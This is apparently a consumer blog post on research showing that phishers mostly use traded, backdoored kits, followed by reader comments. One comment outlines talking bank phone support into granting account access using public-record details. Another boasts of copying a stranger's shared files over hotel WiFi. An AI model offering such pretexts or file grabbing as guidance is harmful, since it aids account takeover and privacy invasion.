Any Joe Sixpack Can Be A Phisher

The popular conception of phishers is of shadowy electronic masterminds, using a mix of technical prowess, deception and anonymity to trick consumers into handing over the bank account details. Actually, most of them are too stupid to design their own websites. That’s what two security researchers found when they delved deep into the online phishing community.

Their research revealed that most phishers use ready-made kits which made by a small group of people and then sold and traded online. All you have to do is fill in a few form fields, give it an email address to send people’s bank account info to, and deploy it on a compromised server. Boom, insta-phishing scam. What’s more is the kits, servers and programs all routinely have backdoors built in, so the phishers are phishing the phishers. It’s amazing to think that the greatest threat to the modern banking system is being perpetuated by a network of average people whose only unique talent is their capacity for immorality.

Interview with Nitesh Dhanjani and Billy Rios, Spies in the Phishing Underground [Net Security]
(Photo: Getty)


Edit Your Comment

  1. spamtasticus says:

    The “new” Phishing scam going, is that the phishers are actually being phished themselves. These idiots download phishing software to same the public but inside the software they download is a back door that secretly forwards the stolen information to the person who actually wrote the program.

  2. yasth says:

    Subaverage people are generally the criminal classes.

    And a good thing too, as truthfully much of the protections suck.

  3. azntg says:

    I guess the moral of the story is: “Don’t be an idiot. Don’t fall for the idiot’s own idiocy”?

  4. B says:

    where do I sign?

  5. spamtasticus says:

    THe banks are more dangerous and complicitous than the phishers. Try an experiment. Call your own bank and tell them you dont remember you online login info. When they need to “identify” you make like you dont remmember the secret answer to the question they set up a long time ago (this should be easy as most people dont remember anyway). When they try to “help” you identify yourself dont give them any information that is not public record. Remember Social Security Number, Mother’s maiden name, and anything else on your credit record is in fact Public Record. If you doubt me just think back how many times you have handed companies your social. Then try to imagine how many people in that company have access to your social. You will find that you will get access to your online account over the phone (the fact that it is actually yours is a technicality in this experiment). Trust me, I write database systems for some of the largest companies and organizations in the world as well as medium size businesses. I’ts not the “evil” hacker you need to worry about, i’ts the 700 employees that have access to all your info within the company.

  6. spamtasticus says:

    @spamtasticus: my fault for not reading the whole comment before exitedly being the first poster lol

  7. bohemian says:

    @spamtasticus: To start using online services or to retrieve lost login info with both of our banks requires an in person trip to the main branch. These are both local/regional so it would only be an issue if we move out of town again.

  8. Nytmare says:

    I believe it’s the same situation with spam, spyware, and bot-net builders – peon spammers will pay $500 for junky software from other spammers to spam with, spyware makers create endless clones of their software, and bot-net operators build referral networks to get others to install their spyware and trojans for them. The only ones who really make money are at the top of the pyramids.

  9. Yes, you too can be a phisher simply by opening “Network Neighborhood” on your Windows or Mac machine while at a hotel with free WiFi.

    I scored a bunch of interesting papers, about 1GB of music, and several neat pictures and videos while at a hotel recently from someone named “NANNASXP”.

    Dumb, dumb, dumb. Folks, either set your machine up properly, use an OS that is locked down to begin with, or stop surfing free Hotspots!

  10. lemur says:

    From the OP:

    The popular conception of phishers is of shadowy electronic masterminds, using a mix of technical prowess, deception and anonymity to trick consumers into handing over the bank account details.

    Well, the “popular conception” is formed from bad news reports. I can’t count the number of times I’ve read articles that were authored by journalists who obviously don’t understand anything to security. If a computer is involved, suddenly a crook becomes a genius and it does not really matter whether or not any great mental powers were required to commit the crime.

    If a crook finds the key to your house which you left under your backdoor mat, he’s just a crook. But if a crook finds the password to your computer which you left in the bottom drawer of your desk, he’s a genius!

  11. theblackdog says:

    @CaliforniaCajun: several neat pictures and videos while at a hotel recently from someone named “NANNASXP”.

    Aren’t most people who are called “Nanna” a grandmother?

    *backs slowly away*

  12. elangomatt says:

    I have always thought it was pretty obvious that it was just some Joe Schmo doing the phishing scams because if the phishers are smart, they would actually use proper spelling, grammar, and punctuation. I usually like to read the phishing emails just to laugh at all of the mistakes in them. I am also quite impressed once in a great while when I actually get a flawless phishing email. I actually printed out a phishing email the other day before deleting it because it was such a well done email, I can understand how some people can get pulled in.

  13. Ghede says:

    … You have to admire the crackers, dubious evil bastards they are. They are both increasing their potential income, and protecting themselves from potential legal action. They’ve created a true organized crime network, and here is the kicker; THE GRUNTS DON’T KNOW WHO THEY ARE!

    That being said, all phishers, spoofers, spammers, crackers, and making-up-namers should be hunted down, and serve their proper sentences. They are people who think that because they are more informed than you, they can ruin your life. They are impeding progress.

  14. MYarms says:

    If these phishers are actually morons like they say then how are they deploying these programs on compromised servers? Wouldn’t that process take some kind of technical know-how?